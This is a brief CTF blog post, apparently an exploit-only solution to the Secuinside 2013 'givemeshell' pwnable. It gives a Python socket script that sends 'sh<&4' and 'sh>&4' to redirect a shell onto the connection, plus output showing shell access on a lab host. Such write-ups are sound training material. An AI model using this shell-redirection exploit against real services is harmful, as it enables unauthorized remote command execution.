CTF/2013

Secuinside CTF 2013 Qual - 6. givemeshell (Exploit only)

pwn3r_45 2013. 7. 23. 21:29

Category : Pwnables 


givemeshell

 

Summary : 5byte command


Exploit

#!/usr/bin/python


from socket import *


HOST = "192.168.123.134"

PORT = 7879


cmd = ""


s = socket(AF_INET, SOCK_STREAM)

s.connect((HOST, PORT))

s.send("sh<&4")

s.send("sh>&4\n")

while 1:

cmd = raw_input("$ ")

if cmd == "exit":

break

else:

s.send(cmd+"\n")

print s.recv(1024)

s.close()



root@ubuntu:~/givemeshell# ./exploit.py 

$ id

uid=1005(givemeshell) gid=1005(givemeshell) groups=1005(givemeshell) 




저작자표시 (새창열림)